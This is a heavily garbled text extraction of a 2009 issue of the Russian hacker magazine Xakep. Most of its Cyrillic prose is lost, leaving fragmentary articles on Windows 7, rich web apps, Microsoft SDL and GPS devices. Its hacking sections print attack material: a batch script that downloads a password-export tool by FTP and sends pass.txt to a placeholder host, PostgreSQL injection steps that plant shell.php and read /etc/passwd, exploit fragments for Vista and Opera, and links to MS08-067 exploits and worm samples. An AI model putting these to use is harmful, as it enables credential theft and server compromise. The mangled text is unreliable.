January 01 (121) 2009. How to make your own Windows build, p. 128. A magazine from computer hooligans, www.xakep.ru. Making money with poker-room bots, p. 96. The most powerful bugs in popular PHP classes, p. 62. New technologies for building rich web applications, p. 26. X-experiment: upgrading a GPS navigator, p. 36. First impressions of the new Windows, p. 20. Windows 7: first impressions of the new Windows.

Хакер 2009 01(121).pdf

Nov 30, 2015


readxakep

  • , . -, : - 10 , --. , , , , , . :).

    P.S. X-party . .

    nikitozz, . . Xudalite.livejournal.com


  • 092 -

    CURL BUILDER C++

    096 , ,

    -

    102

    \++

    104

    108

    Syn/AcK112

    WAIK: WINDOWS

    118

    WIN2K8 WSUS 3.0 SP1

    122

    128 lIvecd:

    LINUX

    132 pSychO:

    136 fAq unIted

    FAQ

    139

    8,5

    140

    142 x-puZZle

    144 www2

    WEB-

    004 MeGAnewS

    ferruM016

    -

    pc_ZOne020 wIndOwS, 7:

    -

    026 rIA-

    -

    032 Sdl, MIcrOSOft

    SECURITY DEVELOPMENT LIFECYCLE

    036

    GPS-

    040 eASy hAcK

    044

    048 qIp

    -

    052

    056

    3D-

    062

    PHP-

    066

    070 -tOOlS

    072

    078 x-Stuff

    082

    086

    UBUNTU 8.10 KUBUNTU 8.10:

    091 tIpS'n'trIcKS

    Content01(121)

    WEB-

  • /> nikitozz ([email protected]) > gorl([email protected])

    > Forb ([email protected]) PC_ZONE UNITS step ([email protected])UNIXOID, XAKEP.PRO PSYCHO Andrushock ([email protected]) Dr. Klouniz ([email protected]) Dlinyj([email protected])> ([email protected])

    /dvd> Step ([email protected])> unix- Ant > ([email protected])>

    /Art>- ([email protected])> ([email protected])>

    /xakep.ru> ([email protected])

    /> ([email protected] )> ([email protected]) ([email protected]) ([email protected])> ([email protected])> ([email protected])

    /publishing> ([email protected])> > ([email protected])> ([email protected])> ([email protected])> ([email protected])> ([email protected])> ([email protected])>pr- ([email protected])

    / > ([email protected])> ([email protected] )

    > ([email protected]).: (495) 935.70.34: (495) 780.88.24> .: 8 (800) 200.3.999

    > 101000, , , / 652, , 77-11802 14 2002 . ScanWeb, . 100 000 . .

    . : . , , . .

    . .


  • x 01 /121/ 09

    >> meganews>> meganews

    Meganews

    Mifrill

    / [email protected] /

    , , . , . - CD- DVD-. , . , , - . . , , 100 , . , -, , , , .


    Nokia , , , . Nseries . N97 3.5" QWERTY- . - WiFi, Bluetooth, GPS, 5- Carl Zeiss, 32 16 (-

    microSD-). -, Flash-, , . Nokia A-GPS N97 , , ( ). 2009 , 550 .

    ASUS Eee PC 60% .

  • 006

    IE .

    1.91% .


    100.000 Creative Commons.

    , - . 2009 1- . , , . , , - . , , . , , . - , - . , :).

    Windows, , - . , , . , Microsoft Windows XP Microsoft Office XP. , , , , , , . , : 117 . , . , , , , - .

    - , , - . . TN Games, - , , - HTX Helmet, . , - FPS. 2009 , . , TN Games, , , , - $200, .


  • >> meganews


    9 AOL ICQ- 5.1.

    . , , - , - . -, , - . ;-)

    - . , , :-), ;), :) . . -, , Nestle , , . (, ) . -, ; -, - , , , , . , - , . , -, .

    , , -. - . , , , , Lingvo X3 ME, ABBYY . ME Medved Edition, . - , IT-, - . - - , 490 . , -, ABBYY , - - - .

    , - . , , , Windows. , - 250.000 . , , - , . , , , , Microsoft . . , , . , , -. , , , , .

    .

    2009 .


  • x 01 /121/ 09


    ? , , , . . Facebook , . Facebook (Adam Guerbuez) . , , . , $873 . - Facebook 2008 $300 . , Facebook 4 . -, , , . , , . Facebook , - , .

    Windows 90% : 89.62%.


    , . ( ), . , . www.biletam.net . , ( ), . , ! , . , 27 . , - . , , , , , , .


    Palm, , , - . , , ; , - . . -

    , Palm - Apple , ,

    Palm Nova. , Palm Palm OS 5. Nova , 2009 . BlackBerry iPhone, 2% . , , App Store. -, . , !

  • x 01 /121/ 09


    512 SSD , 10 , . Toshiba SSD- 64, 128, 256 512 . , 512 , 1.8". 2.5". MLC--, Toshiba 240 \ 200 \ . , AES-. -, , 2009.

    , , , . 1250 ( ) 1- 2008, , . : . , , , , . -, , , . , . , , YouTube -, - , , , .

    , Yahoo! , Microsoft. , . Microsoft $47.5 ., Yahoo! . 2008 Microsoft , . , Yahoo! ( - , 2008 ), - Yahoo! . , , , . , $20 . , Microsoft AOL Fox Interactive Media , , , . Microsoft .

    1234567. 123456.?

  • x 01 /121/ 09


    -, EBay. , , . - , - , , - . , , 0000. , . , , . - EBay , , , , .

    512 SSD

    Microsoft , , . . - Windows 7 , , . Device Stage, Jump Lists. Windows Advanced Rasterization Platform (WARP), DirectX 10 10.1 . Windows Live, . Windows 7 , Vista, 2010-. -, -, 2009. , . , Vista - Service Pack 2. , Vista SP1. SP2 2009 . - , , , .

  • x 01 /121/ 09


    !

    Google, Google Chrome, . - , , . Gmail -- ( , ) : Gmail . Chrome , -, Opera. , , Opera -, Chrome 0.71% 0.83%. , ,

    Firefox 3 Chrome. , , Gmail. IE -, , . , 7- , 7- (, Google ). , , : Internet Explorer, IE8, - : Firefox 3 Chrome. Chrome Google Earth. - !


    -

    ,

    , -

    . 2008 $82 .

    - .

    , -

    10.000. - , ,

    - (, ) ,

    - . -

    , ,

    . .

    , - - , . , Telstra, , . , . -, , . . - , .

  • >> meganews


    - . , , -, , . , -, , . , , ? , ,

    Grippity. , QWERTY- - . , () . , , -. , Grippity - , , , . . $100, .


    . , , Abit - . Abit , 2004 . - - . , - , Universal Scientific Industrial (USI). USI Abit , , . Abit - , , , . , . 1- 2009 Abit - .

  • >> ferrum

    , , - . , , - - -. Skype , ICQ, Mail- yahoo-messenger. , , . 128 /. , . -, 640480 . , , . , , . , smotri.com - , . , web-. , .

    . . . , , , . Skype , , -.

    Skype. - , 10 /. ! , . Windows XP Professional SP3 - . . , . ( - -). , , .


    -

    ! ,

    - .

    . -

    .

  • >> ferrum


    Creative, , . . , - , . : , , . - - . . . . . . : , USB . ( ). . - , .

    : : 1,3 :1280 x 1024 : 5 ( ) : 30 / : USB 2.0

    Creative Live! Cam Notebook Ultra


    Genius iSlim 321R : : 0,3 : 640 x 480 : 0,3 ( ) : 30 / : USB 2.0

    Genius , - . - . - . ( ). , . - , , , . , . , - . , , . . , , . : , .

    2300 .

    750 .


  • . - , , , - . . - - 2 . , USB. . , , , - , . , -. . - . , . , : , . , , , -. , , . : , , .


    1400 .

    . , - , , , -. ( -) , , . - , , . . . , - ( ). . -, , , , . . .

    : : 1,3 : 800 x 600 : 1,3 ( ) : 30 / : USB 2.0

    Hercules Deluxe Optical Glass

    2200 .

    : : 1,3 : 1280 x 1024 : 5 ( ) : 30 / : USB 2.0

    Hercules Dualpix Chat and Show

  • , 100% . , - web-, . . Logitech QuickCam Sphere AF. ,

    . , ( ), Creative Live! Cam Notebook Ultra -. Microsoft LifeCam VX-5500 , . ! z

    : : 0,3 : 640 x 480 : 1,3 ( ) : 30 / : USB 2.0

    Microsoft LifeCam VX-

    Microsoft . : , (Russian edition?). -. , . , : . , 0,3 . , : . : , . , . . : -, , , . : , ( 640480).


    Logitech. , . -, Carl Zeiss . -, . -, , . -, . , 26-- . - . , , , , . . - , .

    : : 2 : 1600 x 1200 : 8 ( ) : 30 / : USB 2.0

    Logitech QuickCam Sphere AF


    4600 .

    2300 .

  • Vista, Microsoft

    Windows 7. !

    2010 , preBeta- !

    : blAcKcOMb , Windows 7 - Microsoft. , Windows XP Vista . Windows 7 . ,

    , , . Windows 7 Microsoft! 2000 . , , Microsoft BlackComb 2005 , 2001

    WindoWs, 7:

    sPider_Net

    / [email protected] /

    >> pc_zone


    -

  • , BlackComb Windows LongHorn, Vista. Blackcomb Vienna. , , Windows 7 , ! , Microsoft . , , . ; , Vista. -, . PreBeta-- build 6801. Microsoft PDC, -. 6933, - 6801, .

    , , -. . 6956, , . , , .

    UAC, , , - . . Microsoft, , , - . , (, slow_work=on?), : Windows 7 ! !

    Windows 7

    WordPad


  • . Pentium 4 ( Vista 40-45 ). . Aero , , . , . - (Visual Studio 2008, Delphi 2009 ..), , . : , ?. , , Vista. , 30 . : -

    Windows 7? ! , PreBeta, . : Vista . , 2-3 . , . - , Asus eeeP .

    -. , -. Windows 7 - SuperBar . , , -. .

    Vista . - , - -. , . , , - .

    - - ( Libraries), - . - . -, -. - , - .

    -, . - .

    info

    (Super Bar)

    TC TC

    ISE UAC

    Windows Media Player


  • . : ? . , , Windows. . . Vista, , . , - , . , , , ( ). : - .Windows , . -: Word . , Microsoft - SideBar, . , , - .

    , Microsoft : MS Paint, , WordPad .. Windows 95. 2010 Microsoft . , MS Paint ribbon; - - PNG.WordPad , , MS Paint, . , -, , . , Windows Media Player. , , - , :).

    --, Microsoft - , *nix-. -, ,

    - Windows 7 , Windows 7, - . : , , , , . ? Windows 7 , . (- , , 50% ; ) - AeroSnap (www.aerosnap.de.vu). , Winsplit Revolution (www.winsplit-revolution.com). UAC, , Vista . , , Nortons User Account Control (www.nortonlabs.com/inthelab/uac.php). , , , - , . Life Rocks blog , , , wallpaper, . : www.nirmaltv.com/2008/11/07/transform-vista-to-windows-7. Aero Peek, , . , Visual Task Tips (www.visualtasktips.com), Taskix (taskix.robustit.com).


  • . bat , CScript . 2006 MS PowerShell , .NET Framework. MS. Windows 7 - - .

    Windows -. , Windows Solution Center. -, , . UAC, , - , . , .Vista User Account Control, - . ( API-, , ), - . Windows 7, , UAC . , UAC , . , UAC , .

    OutrO by Step , -, - , , , ... . Vista . , Daemon Tools, . . , , . , :)P.S. 14- . . z

    >>

    6801 , Vista. , -. . , , - . , : 1. ( ) - Rafael. 2. Windows.3. :

    > takeown /f %windir%\explorer.exe

    > cacls %windir%\explorer.exe /E /G :F

    > start unlockProtectedFeatures.exe

    4. .


  • 026 x 01 /121/ 09

    - rIA () - , : , . , ( , ). , - ( ). , , . ActiveX Microsoft Java-, , , , . Flash , , , API, . : - - - , , , .

    , , . , - (, , , ) Google Chrome , . , , . , Mozilla Prism, Mozilla Firefox (, ). , Safari . - -, , . Flash-. Adobe AIR, - Adobe (z, #111).

    -

    -

    . - ,

    . AJAX!

    -

    ?

    RIA-

    / [email protected] /


  • 027 x 01 /121/ 09

    ? , RIA-. RIA Rich Internet Application , , ( -) . , , , , , HTML. RIA , -

    . , - , , , , , , . , -, - ! :

    BrowserPlus Yahoo -,


    RIA-!

    dvd

    - Silverlight 2 - : http://silverlight.net/GetStarted/overview.aspx.

    : www.silverlighter.ru, www. silverlight.ru.

    Unix- : www.go-mono.com/moonlight.

    -! - MS Expression Studio 2 - Microsoft: expression.microsoft.com.

    links

    Doom !

  • 028 x 01 /121/ 09

    RIA- ! , ?

    GOOGle GeArS GOOGle: gears.google.com : Firefox, Internet Explorer Safari, Android Windows Mobile: Google Docs docs.google.com Google Reader reader.google.com

    RememberTheMilk www.rememberthemilk.com Zoho Writer zoho.com - Wordpress Google ChromeGears , AJAX-. - . , Google Gears -

    Titanium (www.titaniumapp.com) - , -- HTML/CSS/JavaScript - , , -- -. .

    info

    Flex

    Silverlight Microsoft

    Google Gears Yahoo BrowserPlus - , Flash, Silverlight JavaFX .

    RIA - , .

    warning


  • 029 x 01 /121/ 09

    , . , Google Docs, WiFi-, - 20. , Gears. , , - Google. , Gears, , , Google Docs, Wordpress. 2.6, - Gears - . - , . MySpace , ( , Gears , , - ). : Google Gears ? . API, - . (-, SQL- , - ), API , --, JavaScript- . , , : - , - . Google Gears - , , . , /

    ( - kernal32.dll, -), ! URL - . : Google Gears . - , gears.google.com . Google Chrome , . -, Google Gears Adobe Flash, .

    yAhOO! brOwSer pluS yAhOO : browserplus.yahoo.com : Firefox, IE 6/7,Safari, Chrome, Mac PC: Yahoo!, Flickr

    Yahoo! Browser Plus , - - ( JavaScript). Google Gears, , : !. Gears, BrowserPlus . : - , drag-n-drop, -, . - ImageMagick , Photoshop Express Adobe MS Paint. , Ruby, , ( Gears, , , ) Text-to-Speech (, , ). : , , . , , : , - .

    MIcrOSOft SIlverlIGht/MOOnlIGht - : microsoft.com/silverlight/ : Firefox, IE 6/7, Safari, Mac, PC

    Gears !

    Google Gears , - AJAX- - Gears ( - , ). , Gears : - - , . , - Google Gears: Dojo Toolkit jQuery ( jquery-offline, http://code.google.com/p/jquery-offline); ExtJS , , .


  • 030 x 01 /121/ 09

    Linux/Unix: Microsoft NBA iStreamPlanet - sky.com Flash- , Microsoft, , ( , , ) .NET Framework, -. MS Silverlight, , Mono, Linux/Unix Moonlight, . , , Gears BrowserPLus. Silverlight -, .NET. - ( HD-, DRM-, - - VC-1, WMV, WMA, MP3), ( C#, .NET-), XML , . DHTML JavaScript, , , Silverlight -, , . API XMLHTTPRequest, AJAX-: , (, AJAX- server-push Comet ). , - . Silverlight , - JavaScript API, - , .NET. , Microsoft , -, Silverlight 2, ! , ,

    Windows, Mac, Linux.

    AdObe flASh/flex : http://www.adobe.com/products : Firefox, IE 6/7, Safari, Mac, PC Linux/Unix: Adobe www.orbismap.com eBay Google Analytics Flex- http://wiki.flash-ripper.com/?title=_Flex-Flash , , . , RIA-- Adobe Flex. Flash, -

    Silverlight , ImageCup


    Quake Native Client (http://code.google.com/p/nativeclient) Google, x86- ! , , ! Linux ! , Quake . , , :1. Native Client (http://code.google.com/p/nativeclient);2. Google Chrome Firefox http://projects.cocaman.net/quake/quake.html.

  • 031 x 01 /121/ 09

    , , MXML, , GUI-. , Flash Adobe . 10- -. - , Silverlight, , -, HD, Adobe Pixel Blender! . , , Flash - . , FarCry Crysis , Quake/Doom ! Adobe Alchemy -. - - , , , ++. ++

    ( , , , ). C++ , , 3D-, , , 3D DirectX OpenGL! , ( , http://alternativaplatform.com/ru), , . Doom ? www.newgrounds.com/portal/view/470460.

    ? . - - (, ) . JavaScript, , , -. , , !. , - , .NET Microsoft. - Silverlight Adobe Flash/Flex/Alchemy, , (C# .NET Framework Silverlight 2, ++ Alchemy) . , JavaScript , . , IDE ( , , - ?). , RIA- , , , , , , . : -, , ? , , ? :)z

    . , - !


    Sun, - Java JavaFX. RIA-, FxScript. JRE - (, Silverlight Flash), , -, , - . , Java , JavaFX. , , Sun java-... : http://www.javafx.com/about/overview

  • 032 x 01 /121/ 09

    SECURITY DEVELOPMENT LIFECYCLE

    2003 , 1.500.000 ,

    3.370.000 ,

    RPCSS.

    , -

    ,

    Senior Development Lead Microsoft.

    Microsoft BlackHat, , . . Microsoft -

    , , - . : 50000 , Microsoft, . ! , , . , , SDL Security Development Lifecycle.

    Sdl - . , SDL -

    SEC(R)2008, . . SDL . , , - best practices , , . : , , , -. SDL , : , , , , , , . , SDL - , . , ( ). , - , . , , ,

    SDL, Microsoft

    , 1999 , . , Windows, .


  • >> pc_zone


    , !, , - , SDL : Microsoft . . : , ! -. Microsoft Security Response Center, . , , - , - , - , , RPC, , SDL, . - , ( ) , , -. , , . , -, (), - , , . , SDL .

    ? : SDL ? ,

    , :). - SDL Optimization Model, , , , SDL . , SDL ( ), , , - . C/C++ /GS ( ), /SAFESEH (/SafeSEH) SDL. - . Best Practices /NXCompat, (DEP) (/NXCompat). , PREfast, FxCop, Application Verifier. PREfast Visual Studio ( 2005) - /analyze. , _alloca, :

    char *b;

    do {

    b = (char*)_alloca(9);

    } while(1);

    - , Visual Studio, FxCop

    FxCop managed-

    SDL

    , , , - Blaster, :

    WCHAR wszMachineName[N+1] {

    WCHAR wszMachineName[N + 1];

    LPWSTR pwszServerName = wszMachineName;

    while (*pwszPath != L'\\')

    *pwszServerName++ = *pwszPath++;

    }

    pwszPath, wszMachineName.

  • >> pc_zone


    , .NET Framework ( , ). , - .Application Verifier - unmanaged-. , . AppVerif , , . , - API, -. - Visual Studio. IDE , , -, strcpy. :

    void func(char *p) {

    char d[20];

    strcpy(d,p);

    // etc

    }

    *p , . strcpy , ( - ). Visual C++ stdafx.h :

    #define _CRT_SECURE_CPP_OVERLOAD_STANDARD_NAMES 1

    , :

    void func(char *p) {

    char d[20];

    strcpy_s(d, _countof(d), p);

    // etc

    }

    , SDL. . , . SDL , - , , .

    . , Microsoft SDL, , SDL. , . , - , . , -

    Microsoft - SDL (, 3.2, MS 4.0). SDL , -.

    info

    SDL Threat Modeling Tool

    DVD - .

    dvd

  • >> pc_zone


    . SDL Threat Modeling Tool Microsoft, , , Visio. , ? - ! , (), , . . . , . , , , - . , :

    1. ? : .

    2. ?

    3. - ? ! , , .

    , . SDL Threat Modeling Tool , -, . , .

    MS , , , , . - , . , , - : API . , , , - ( ). . -, . , , - - . , Word doc-, JPEG. JPEG , , , -, , .-, . , Word : doc-, . . -

    , , . , , , , Man-in-the-middle . :1. (dumb) . .2. (smart) . , , JPEG - - . , , . , . ? . , NDA. : , Microsoft, Peach ( , http://peachfuzzer.com). , peach pits ( ) , . : , RPC, COM/DCOM, SQL- . : FileFuzz, Fuzzing Software (http://www.fuzzing.org/fuzzing-software); File Fuzzers, Fuzzbox, Windows IPC Fuzzing Tools, Forensic Fuzzing Tools iSEC Partners (www.isecpartners.co).

    Sdl? ! - , . : - ! z

    SDL , SDL , - , , . SDL, , , . Microsoft Microsoft Source Code Analyzer for SQL Injection XSS Detect Beta. Visual Studio XSS- -. XSS , : RATSRough Auditing Tool for Security (http://www.fortify.com/security-resources/rats.jsp) ProxMon (http://www.fortify.com/security-resources/rats.jsp). :Microsoft Anti-Cross Site Scripting Library V1.5 for .NET applications AntiXSS for Java (http://www.gdssecurity.co) :SiteLock ActiveX - - . Best Practices, ;Banned.h -, , SDL.

    Visual Studio 2005, PREfast Visual Studio - /analyze

  • GPS-

    GPS-. , : -

    , - .

    . -

    , !

    GPS- Windows Mobile. - .

    , GPS-! , , , , - . - POI, - (, , , , .., ..). , . , ,

    , , , . , . - , , . , , GPS- , . , - . , , - , . , - , . , GPS-- , - . ,


  • 037 x 01 /121/ 09

    , . , GPS , , !

    eMbedded- ( , , , ), ? , , , : GPS-, . : . , . , . . user-friendly , . , , , -- ( - ). ! Windows,

    , , . , ? .

    GPS, Voxtel -, ( ) - Voxtel Carrera X433. - , - GPS-, . , - . ,

    ?navitel.ru , - . , , .

    autosputnik.com 2007, . Tele Atlas, . OnLine POI ( , , , ..) .

    iGOi-go.com/ru , . - , , .

    TomTomwww.tomtom.com TomTom -, . . - embedded-, , .

    Garmin Mobile XTwww.garmin.ru - Nokia, Windows, WinCE. , -.

    3.2

    iGO 8 3.2

    TomTom Navigator


  • - , - , Windows CE (WinCE). - Windows , . , , . , Windows CE 32 , . GWES- 5 . , - ( ), GPS-- . , ., ( - PND PNA ), GPS--, BT-, //. , ( ). ,

    , - Windows, : -, .. www.gps-club.ru 4pda.ru, Embedded-, PND-. , SD- shell.ini :

    \windows\explorer.exe

    card-, ActiveSync Microsoft , , - (, USB

    . 512 ( -), fat16 - . , , off on. - . , . , , 10-15. , , , .

    info

    100% gpspassion.com, gps-club.ru 4pda.ru.

    links

    - , , , . .Visual Studio. Visual Studio ( Express-) Windows CE/ Windows Mobile -, , - .

    Platform Builder. , , , . , - . SDK, - Platform Builder. (SuperH, x86, MIPS, ARM).Embedded Visual C++ (eVC). Visual C++ embedded- Windows CE.

    WinCE

    Garmin Mobile XT

    GPS- -

    System Information -

    Mio Menu


  • >> pc_zone


    ). explorer.exe ( ). !, -. - , , , . Audio, Music, Video Navitel, . 3.2, -, , . Navitel.exe , - GPS--. ? , - , , , iGo Igo.exe Navitel.exe. ( )! exe- -. navitel.exe explorer.exe. , , . , , , ceDesktop.exe, . Navitel.exe, , :). , , Windows CE 5.0., ( Windows Explorer), , (\DataStorage\CentralAP.exe), - CONF.ini. - . , , iGo GPS, :

    GPSPath= \User\Navitel\Navitel.exe

    , , iGO8 :). , ( ) , , . , -

    Total Commander WinCE. ? !

    ? , - , Visual Studio ( ). , , , . Voxtel, , - . , - . , - - . !MioPocket 2.0 (http://www.gpspassion.com/forumsen/topic.asp?TOPIC_ID=109690) Mio, . , . , , , , MS Office, - , .. , . : ( ) System Information (http://gpstacho.bettersoft.de)., , , - . : , ? , : - , . , Registry Workshop.! z

    - , Windows CE, , - , , , , . , :1. PNA;2. , ( , - ..);3. Mobilenavigator, exe- mobilenavigator.exe;4. . Voxtel Carrera , .

    GPS-: WindowsCE

  • >>


    r0id

    / [email protected] /

    Easy Hack}

    : Sql- MySql: , SQL- - - . , , - . , LIMIT, , , . , , . GROUP_CONCAT() MySQL => 4.1 . ( concat(), - ). , GROUP_CONCAT() , - . , 1 (aka 1024 ), group_concat_max_len. , - , -. , GROUP_CONCAT():1. .2. , DISTINCT, ORDER BY, ASC/DESC.3. LIMIT.4. 1024 ( ). - GROUP_CONCAT() MySQL => 5 .1. , sql- :

    http://www.hacked.com/index.php?id=-1

    2. ( , [- -] > [ ] . -, , (00401000) - PUSH 0. 6A 00.

    - JMP, PUSH 0

    2

  • >>


    : - : . www.virustotal.com. , , www.virustotal.com ( , 1wmz ). - :). . :1. ///etc : PHP5 cURL, set_time_limit(); .htaccess; - (/etc);2. ( , ChaaK) ;3. 777 ./files;4. index.php, - :

    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#

    $updir = 'files'; #

    $maxfsize = 2048; #

    $sleep = 5; # (-

    5)

    $abort = 180; #

    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#

    , , . , , :). , www.virustotal.com , . , , ChaaK .

    3


    , 00401026. : jmp 00401026, ( ) EB 24. , , EB 24 6A 00. - XOR ( , , ). EB24 6A00, XOR X: EB24 XOR X = 6A00. - X : X = 6A00 XOR EB24, X = 8124. , ; - XOR 2481., :1. OllyDBG PUSH 0, 00401000, jmp 00401026, EB24.2. 00401026, , - :

    00401026 MOV EAX, 00401000 ; EAX

    0040102B MOV EBX, [EAX] ; -

    EBX

    0040102D XOR EBX,2481 ; XOR

    jmp 00401026 PUSH 0

    00401033 MOV [EAX],EBX; -

    ...

    00401035 JMP 00401000 ; ...

    3. . ! - . , : , - , -, , .

    : Sql- pOStGreSql: , MySQL MSSQL, PostgreSQL. . - , . , , , PostgreSQL , , , , -, . :1. - ( -

    , ).2. ( load_file() MySQL). - . -

    - - PostgreSQL, :1. (, table_file).2. - (, ).3. (-) , - -.

    PostgreSQL

    4

  • >>


    : pe- ApI-, dll: IID King 2.0, PE- .1. wasm.ru DVD IID King.2. , , , Pick a file.3. dll, , Click to pick DLL(s) and their API(s) to add.4. , API-, Add Them!.5. API

    Add Them!, Backup ( bak- ). ! , DLL.

    5


    : exe-: , - . - , , ? , , ExeScript, .bat-, .vbs- .js- -. :1. DVD.2. .3. ( vbs/js-).4. .5. exe., , -. :

    @echo off

    Echo open xxx.xxx.

    xxx.xxx>go.txt&&echo

    ftpuser>>go.txt&&echo

    12345>>go.txt&&echo

    get passexport.

    exe>>go.txt&&echo

    bye>>go.txt

    Echo open xxx.xxx.xxx.

    xxx>send.txt&&echo

    ftpuser>>send.txt&&echo

    12345>>send.txt&&echo

    send pass.txt>>send.

    txt&&echo bye>>send.txt

    ftp -s:go.txt > nul

    passexport.exe pass.txt

    ftp -s:send.txt > nul

    del go.txt send.txt passexport.txt pass.txt name.bat

    , , ? - , .

    6

    exe

    :

    CREATE TABLE table_shell(column_shell TEXT NOT NULL);

    INSERT INTO column_shell VALUES('');

    COPY table_shell (column_shell) TO '/var/www/html/

    shell.php';

    4. :

    COPY (SELECT '') TO 'FILE_

    NAME'

    , --, . - 1. ( load_file() MySQL):

    CREATE TABLE table_file(column_file TEXT NOT NULL);

    COPY table_file (column_file) FROM '/etc/passwd';

    SELECT * FROM table_file;

    2. n m :

    pg_read_file('bla.txt',n,m)

    ( n m )3. :

    pg_ls_dir('/tmp')

    4. :

    pg_stat_file('users.txt')

    , . :).

  • >>

    : :, -- . , , , . , ( , host-based ips .). , Rnmap.1. NMAP (rnmap.sourceforge.net).2. rnmap-adduser.py vasia.3. telnet Grnmap.py . Nessus. - (t1shopper.com/tools/port-scanner). , , . , NMAP, - . z

    RNMAP

    8


    : http- SMtp-: HoSproxy HTTP over SMTP Proxy. : HoStunnel HoSproxy. Windows. - HoStunnel , 25 (TCP SMTP). : - ( ), . HTTP- . HoSproxy , HTTP-proxy (tcp 8080), -. HTTP- . , :1. HoSproxy edge-security.com/hosproxy.php ( DVD).2. Hospoxy.cfg :

    # SMTP- :

    #smtp.myserver.com

    local_smtp_server=

    # (Y/N)

    smtp-auth=N

    [email protected]

    smtp-pass=

    #

    (pop, imap, #imapssl, popssl)

    mail_retrieve_protocol=pop

    #

    #pop3.myserver.com

    mail_access_server=

    #

    [email protected]

    #

    mas_passwd=

    #, WEB-

    [email protected]

    # HTTP-

    [email protected]

    3. hosproxy.exe .

    7

    Hostunnel

  • WindoWs ,

    , , .

    RPC dCoM,

    MsBlast. , , ,

    GiMMiv! KeRnelBot.dG, -

    . !


    Ms WindoWs

    >> Brief 2008 Thomas Unterleitner phion AG (Marius Wachtler, Michael Burgbacher, Carson Hounshell Michael Craggs) TCP/IP- . Microsoft VISTA TCP/IP stack buffer overflow, . , TCP/IP- . , ExAllocatePoolWithTag, 32 - ( API- CreateIpForwardEntry2, iphlpapi.dll, 32-, 64- Windows Vista). MSDN, MIB_IPFORWARD_ROW2, PrefixLength 32 ( ). , PrefixLength DWORD, memcpy. - . , shell-. CreateIpForwardEntry2 - , , , , -, ( , ). 64- Windows , . , Service Pack 1! 64- XP , -

    MIB_IPFORWARD_ROW2. PrefixLength , Server 2003. , , ... , , . , ,

    , . , . - securityfocus.com/archive/1/498471.. >> TargetsVista Home/Business/Enterprise/Ultimate x32/x64 SP0/SP1 >> Exploit exploit, - , Thomasa Unterleitnera securityfocus.com/data/vulnerabilities/exploits/32357.c. . IP- ! - . IP- .

    explOIt, MIB_IPFORWARD_ROW2 route;

    route.InterfaceIndex = atoi(argv[1]);

    route.DestinationPrefix.PrefixLength = atoi(argv[2]);

    route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr = inet_addr("1.2.3.0");

    route.NextHop.Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44");

    route.Protocol = MIB_IPPROTO_NETMGMT;

    route.Origin = NlroManual;

    route.ValidLifetime = 0xffffffff;

    route.PreferredLifetime = 0xffffffff;

    route.Metric = 1;

    CreateIpForwardEntry2(&route);

    >> SolutionMicrosoft , , . , , , . .

    MS WINDOWS

    >> Brief , , support#killprog.com.

    !

    01

    02

  • >>


    API- UnhookWindowsHookEx ( ) ( API- SwitchDesktop) win32k.sys, - . , API- ! . , ( ) - . , . exploit, support#killprog, , API- Sleep(0) . exploit . , (, -) . - exploit , Windows . murphy-law.net.ru securityfocus.com/bid/32206.

    >> Targets: Server 2003 Standard/Enterprise/Datacenter x32/x64 Vista Home/Premium/Ultimate x32/x64. -, , .

    >> Exploit exploit, , securityfocus.com/data/vulnerabilities/exploits/whk.zip Microsoft Visual C++ exe/dll ( ).

    >> Solution ! , Microsoft , . - , -, ( -, ). , . Server 2003 USER32.DLL , UnhookWindowsHookEx SwitchDesktop .

    OPERA

    >> Brief , , . - ( ), , shell-. 2008 ( ~16,500 ) URL file. Security Focus ( securityfocus.com/bid/32323) , HTML- exploit. , - , offline, . , , - . , :).

    >> Targets 9.6 9.62.

    >> Exploit exploit, , milw0rm.com/exploits/7135, .

    explOIt,

    var i=0;

    // push es, pop es

    var block = unescape("%u0607%u0607");

    // metasploit WinExec c:\WINDOWS\system32\calc.exe

    var shellcode = unescape(%ue8fc%u4100);

    while (block.length < 81920) block += block;

    var memory = new Array();

    for (;i Solution , - , . , .

    MS WINDOWS RPC

    >> Brief2 2008 ( ) 20- . , RPC. - Windows 2000 /Server 2008 - . 32-, 64-, - . Trojan-Spy:W32/Gimmiv.A/B/C, W32/Conficker.worm, Trojan:Win32/Wecorl.A/B, Trojan:Win32/ Clort.A/!exploit/dr, TrojanDownloader:Win32/VB.CQ/CJ , , . exploit , , . Microsoft , - , - ( ), ! Microsoft , ( , )., . , -: microsoft.com/technet/security/Bulletin/ms08-067.mspx securityfocus.com/bid/31874, http://blogs.technet.com/swi/ blogs.msdn.com/sdl/archive/2008/10/22/ms08-067.aspx.

    >> Targets NT- : W2K Professional/ Server/Advanced/Datacenter SP0/SP1/SP2/SP3/SP4, XP Gold/Home/Professional SP0/SP1/ SP2/SP3 x86/x86-64, Vista


    Home/Business/ Enterprise/ Ultimate SP0/SP1 x86/x86-64, S2K3 Standard/Datacenter/Advanced/Enterprise SP0/SP1/SP2 x86/x86-64/ Itanium, S2K8 Standard/Datacenter/Advanced/Enterprise SP0 x86/x86-64/ Itanium.

    >> Exploits exploit , ... , , , (W2K, XP, S2K3). S2K8 exploit , , ! , :1. MS08-067 Remote Stack Overflow Vulnerability Exploit by Polymorphours W2K, , : milw0rm.com/exploits/7104.2. MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled) W2K S2K3[SP2], , : milw0rm.com/exploits/7132.3. MS08-067 Exploit for CN by [email protected] -, XP, S2k3 . - , exploit, : milw0rm.com/sploits/2008-MS08-067.rar.4. MS08-067 Gimmiv Worm.A (- ): offensivecomputing.net/?q=ocsearch&ocq=d65df633dc2700d521ae4dff8c393bff

    >> Solution Microsoft , - , ( microsoft.com/technet/security/Bulletin/ms08-067.mspx) , . 139 445 , -. - , , 5c 00 2e 00 2e 00 5c 00 (\..\), 2f 00 2e 00 2e 00 2f 00 (/..), 5c 00 2e 00 2e 00 2f 00 (\../) 5c 00 2e 00 2e 00 2f 00 (/..\). (kpnc.org/ftp/MS08-067.zip, 123456). RPC SRVSVC , ( ). , .

    >> Disclose , /exploit. , , , ? ? -, , exploit . , Microsoft, . , - RPC , , ! , -. Microsoft , , . , , W2K S2k8. , - W2K, - Windows2000-KB958644-x86-RUS.EXE, CAB-. - ? exe HIEW, MSCF. .cab, Windows- compress.exe RAR, netapi32.

